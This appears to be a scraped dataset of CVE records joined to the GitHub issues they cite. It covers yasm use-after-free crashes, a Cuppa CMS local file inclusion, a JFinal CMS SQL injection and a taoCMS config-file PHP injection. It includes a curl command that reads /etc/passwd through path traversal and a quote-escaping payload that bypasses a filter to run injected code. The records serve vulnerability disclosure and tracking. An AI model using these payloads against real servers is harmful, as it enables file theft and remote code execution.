{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/163" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/163
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-5020-pp_getline-UAF ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==18582==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e00000ccb8 at pc 0x7f24ad5c6232 bp 0x7ffdbe2b8fb0 sp 0x7ffdbe2b8fa0 READ of size 4 at 0x60e00000ccb8 thread T0 #0 0x7f24ad5c6231 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5024 #1 0x7f24ad5a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #2 0x7f24ad59b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #3 0x7f24ad58f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #4 0x7f24ad58f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #5 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #6 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #7 0x7f24b06e082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #8 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) 0x60e00000ccb8 is located 152 bytes inside of 160-byte region [0x60e00000cc20,0x60e00000ccc0) freed by thread T0 here: #0 0x7f24b0f9a2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7f24ad5bfd48 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5009 #2 0x7f24ad5a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #3 0x7f24ad59b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #4 0x7f24ad58f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7f24ad58f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7f24b06e082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) previously allocated by thread T0 here: #0 0x7f24b0f9a602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f24b0ceb769 in def_xmalloc test/yasm-uaf/SRC_asan/libyasm/xmalloc.c:69 #2 0x7f24ad5b500b in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3211 #3 0x7f24ad5c0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #4 0x7f24ad5a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #5 0x7f24ad59b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #6 0x7f24ad58f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #7 0x7f24ad58f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #8 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #9 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #10 0x7f24b06e082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-use-after-free test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5024 pp_getline Shadow bytes around the buggy address: 0x0c1c7fff9940: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00 0x0c1c7fff9950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff9960: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c1c7fff9970: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa 0x0c1c7fff9980: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd =>0x0c1c7fff9990: fd fd fd fd fd fd fd[fd]fa fa fa fa fa fa fa fa 0x0c1c7fff99a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff99b0: 00 00 00 00 fa fa fa fa fa fa fa fa 00 00 00 00 0x0c1c7fff99c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff99d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1c7fff99e0: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==18582==ABORTING ```
AddressSanitizer: heap-use-after-free in pp_getline() modules/preprocs/nasm/nasm-pp.c:5024
https://api.github.com/repos/yasm/yasm/issues/163/comments
1
2021-05-19T08:19:19Z
2024-03-21T12:37:57Z
https://github.com/yasm/yasm/issues/163
895,140,170
163
CVE-2021-33468
2022-07-26T13:15:09.903
An issue was discovered in yasm version 1.3.0. There is a use-after-free in error() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/162" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/162
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-4826-error-UAF ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==17967==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e00000cd08 at pc 0x7f820a4aa94b bp 0x7ffd4c279450 sp 0x7ffd4c279440 READ of size 8 at 0x60e00000cd08 thread T0 #0 0x7f820a4aa94a in error test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:4830 #1 0x7f820a4aceaf in tokenise test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:1352 #2 0x7f820a4c0300 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5037 #3 0x7f820a4a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #4 0x7f820a49b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #5 0x7f820a48f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #6 0x7f820a48f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #7 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #8 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #9 0x7f820d6ae82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) 0x60e00000cd08 is located 8 bytes inside of 160-byte region [0x60e00000cd00,0x60e00000cda0) freed by thread T0 here: #0 0x7f820df682ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7f820a4bfd48 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5009 #2 0x7f820a4a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #3 0x7f820a49b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #4 0x7f820a48f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7f820a48f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7f820d6ae82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) previously allocated by thread T0 here: #0 0x7f820df68602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f820dcb9769 in def_xmalloc test/yasm-uaf/SRC_asan/libyasm/xmalloc.c:69 #2 0x7f820a4b500b in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3211 #3 0x7f820a4c0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #4 0x7f820a4a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #5 0x7f820a49b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #6 0x7f820a48f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #7 0x7f820a48f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #8 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #9 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #10 0x7f820d6ae82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-use-after-free test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:4830 error Shadow bytes around the buggy address: 0x0c1c7fff9950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1c7fff9960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1c7fff9970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1c7fff9980: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c1c7fff9990: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa =>0x0c1c7fff99a0: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c1c7fff99b0: fd fd fd fd fa fa fa fa fa fa fa fa 00 00 00 00 0x0c1c7fff99c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff99d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1c7fff99e0: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c1c7fff99f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==17967==ABORTING ```
AddressSanitizer: heap-use-after-free in error() modules/preprocs/nasm/nasm-pp.c:4830
https://api.github.com/repos/yasm/yasm/issues/162/comments
1
2021-05-19T08:17:11Z
2024-03-21T12:39:00Z
https://github.com/yasm/yasm/issues/162
895,137,925
162
CVE-2022-34121
2022-07-27T18:15:09.313
Cuppa CMS v1.0 was discovered to contain a local file inclusion (LFI) vulnerability via the component /templates/default/html/windows/right.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/18" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/CuppaCMS/CuppaCMS/issues/18
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Cuppa CMS suffers from local file inclusion vulnerability in '/templates/default/html/windows/right.php' script using $_POST['url'] parameter. Using the following exploit it is possible to include arbitrary server file: curl -X POST "http://IP/cuppa/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../etc/passwd" PoC: ![image](https://user-images.githubusercontent.com/57464251/148463369-b3be3f25-3f56-45ec-9bc5-117fc1fa703b.png) Possible solution: $_POST['url'] should be sanitized against truncation (../ or ..\ , etc...). Disclosure date: 6th January, 2022
Non-authenticated Local File Inclusion vulnerability in CuppaCMS templates
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/18/comments
2
2022-01-06T22:53:08Z
2023-11-14T23:17:05Z
https://github.com/CuppaCMS/CuppaCMS/issues/18
1,095,777,063
18
CVE-2022-34928
2022-08-03T01:15:07.397
JFinal CMS v5.1.0 was discovered to contain a SQL injection vulnerability via /system/user.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/43" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jflyfox/jfinal_cms/issues/43
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
There is a SQLI vul in background mode.The route is as following <img width="910" alt="1" src="https://user-images.githubusercontent.com/58795040/175862384-81e6d16e-8c57-493c-a73b-294ef4deb3d3.png"> vulnerable argument passing is as following <img width="713" alt="2" src="https://user-images.githubusercontent.com/58795040/175862445-f226940b-c0fb-47ca-aef5-605238042c4c.png"> I try to grab packets Inject at orderby <img width="1145" alt="3" src="https://user-images.githubusercontent.com/58795040/175862526-2afdd32e-856b-40a6-b2b2-6123d40c081c.png"> <img width="1136" alt="4" src="https://user-images.githubusercontent.com/58795040/175862835-691a4ab6-83f1-41a2-95d0-2ffdba6ab457.png"> Discovery injection <img width="1277" alt="5" src="https://user-images.githubusercontent.com/58795040/175862761-4cf45ebc-10ce-4e03-ab68-644b5d853b7e.png">
jfinal_ CMS 5.1.0 SQL injection
https://api.github.com/repos/jflyfox/jfinal_cms/issues/43/comments
0
2022-06-27T04:58:14Z
2022-06-27T04:58:14Z
https://github.com/jflyfox/jfinal_cms/issues/43
1,285,238,213
43
CVE-2022-36262
2022-08-15T12:15:20.673
An issue was discovered in taocms 3.0.2. in the website settings that allows arbitrary php code to be injected by modifying config.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Broken Link", "URL Repurposed" ], "url": "http://taocms.com" }, { "source": "[email protected]", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/34" }, { "source": "[email protected]", "tags": null, "url": "https://github.com/taogogo/taocms/issues/34?by=xboy%28topsec%29" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/taogogo/taocms/issues/34
[ "Exploit", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
1. We enter the management page, Go to website settings. ![image](https://user-images.githubusercontent.com/39737245/179381624-70b8a26f-29c1-4208-b373-fff0250394df.png) 2. Next, I want to inject php code by modifying these settings. From the config.php file we found that the modified configuration will be written that. ![image](https://user-images.githubusercontent.com/39737245/179381660-880f02c2-211c-40bc-87d7-f6f53994d864.png) 3. The format of configuration writing is as follows. ``` define('WEBNAME', 'taoCMS演示'); ``` 4. So according to the grammar rules of php, I made the following request. ![image](https://user-images.githubusercontent.com/39737245/179381735-40aef3c1-2b4d-4cbf-bf30-a16d64cef477.png) ``` payload: taoCMS演示');phpinfo();// ``` 5. But I found that after executing the request, the code of the config.php file will have a syntax error. ``` define('WEBNAME', 'taoCMS演示'');phpinfo();//'); ``` ![image](https://user-images.githubusercontent.com/39737245/179381766-e03eab52-9f9a-4eef-aaef-cedd05f773b0.png) 6. when i view the taocms/include/Config.php, When the configuration is modified, the configuration is checked for security. ![image](https://user-images.githubusercontent.com/39737245/179381827-633154f9-d815-474f-8ddb-c2e4eae7690f.png) 7. Follow taocms/include/Base.php, in the safeword function. The core point of discovery is that if the database type is Sqlite, a single (') will be replaced by a pair (''). ![image](https://user-images.githubusercontent.com/39737245/179381928-2e52e418-9ebb-4663-960b-fb0b6f189eb2.png) 8. After knowing all this, I constructed a payload, add a (\) to escape ('). Note that the database type is Sqlite. ``` payload: taoCMS演示\');phpinfo();// ``` ![image](https://user-images.githubusercontent.com/39737245/179382078-ad2fa268-9f76-4c31-a223-a46eb659c45c.png) 9. After executing the request this time, I found that I successfully modified the configuration, and the code syntax check passed. ![image](https://user-images.githubusercontent.com/39737245/179382134-f29035ce-4cb9-4e98-acbf-4677830deeb6.png) 10. When I access Config.php everything works fine and the php code runs correctly. ![image](https://user-images.githubusercontent.com/39737245/179382173-55450e32-b36a-4e7b-a1c0-d28c7fde79de.png)
Bypass security protection injection code in the website settings function
https://api.github.com/repos/taogogo/taocms/issues/34/comments
0
2022-07-17T03:21:56Z
2022-07-17T03:21:56Z
https://github.com/taogogo/taocms/issues/34
1,306,974,846
34
CVE-2022-36262
2022-08-15T12:15:20.673
An issue was discovered in taocms 3.0.2. in the website settings that allows arbitrary php code to be injected by modifying config.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Broken Link", "URL Repurposed" ], "url": "http://taocms.com" }, { "source": "[email protected]", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/34" }, { "source": "[email protected]", "tags": null, "url": "https://github.com/taogogo/taocms/issues/34?by=xboy%28topsec%29" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/taogogo/taocms/issues/34?by=xboy%28topsec%29
null
github.com
[ "taogogo", "taocms" ]
1. We enter the management page, Go to website settings. ![image](https://user-images.githubusercontent.com/39737245/179381624-70b8a26f-29c1-4208-b373-fff0250394df.png) 2. Next, I want to inject php code by modifying these settings. From the config.php file we found that the modified configuration will be written that. ![image](https://user-images.githubusercontent.com/39737245/179381660-880f02c2-211c-40bc-87d7-f6f53994d864.png) 3. The format of configuration writing is as follows. ``` define('WEBNAME', 'taoCMS演示'); ``` 4. So according to the grammar rules of php, I made the following request. ![image](https://user-images.githubusercontent.com/39737245/179381735-40aef3c1-2b4d-4cbf-bf30-a16d64cef477.png) ``` payload: taoCMS演示');phpinfo();// ``` 5. But I found that after executing the request, the code of the config.php file will have a syntax error. ``` define('WEBNAME', 'taoCMS演示'');phpinfo();//'); ``` ![image](https://user-images.githubusercontent.com/39737245/179381766-e03eab52-9f9a-4eef-aaef-cedd05f773b0.png) 6. when i view the taocms/include/Config.php, When the configuration is modified, the configuration is checked for security. ![image](https://user-images.githubusercontent.com/39737245/179381827-633154f9-d815-474f-8ddb-c2e4eae7690f.png) 7. Follow taocms/include/Base.php, in the safeword function. The core point of discovery is that if the database type is Sqlite, a single (') will be replaced by a pair (''). ![image](https://user-images.githubusercontent.com/39737245/179381928-2e52e418-9ebb-4663-960b-fb0b6f189eb2.png) 8. After knowing all this, I constructed a payload, add a (\) to escape ('). Note that the database type is Sqlite. ``` payload: taoCMS演示\');phpinfo();// ``` ![image](https://user-images.githubusercontent.com/39737245/179382078-ad2fa268-9f76-4c31-a223-a46eb659c45c.png) 9. After executing the request this time, I found that I successfully modified the configuration, and the code syntax check passed. ![image](https://user-images.githubusercontent.com/39737245/179382134-f29035ce-4cb9-4e98-acbf-4677830deeb6.png) 10. When I access Config.php everything works fine and the php code runs correctly. ![image](https://user-images.githubusercontent.com/39737245/179382173-55450e32-b36a-4e7b-a1c0-d28c7fde79de.png)
Bypass security protection injection code in the website settings function
https://api.github.com/repos/taogogo/taocms/issues/34/comments
0
2022-07-17T03:21:56Z
2022-07-17T03:21:56Z
https://github.com/taogogo/taocms/issues/34
1,306,974,846
34
CVE-2022-35100
2022-08-16T21:15:10.973
SWFTools commit 772e55a2 was discovered to contain a segmentation violation via gfxline_getbbox at /lib/gfxtools.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/182" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:-:*:*:*:*:*:*:*", "matchCriteriaId": "05E27E60-6223-457B-BF90-E747C9C5DEE1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/182
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
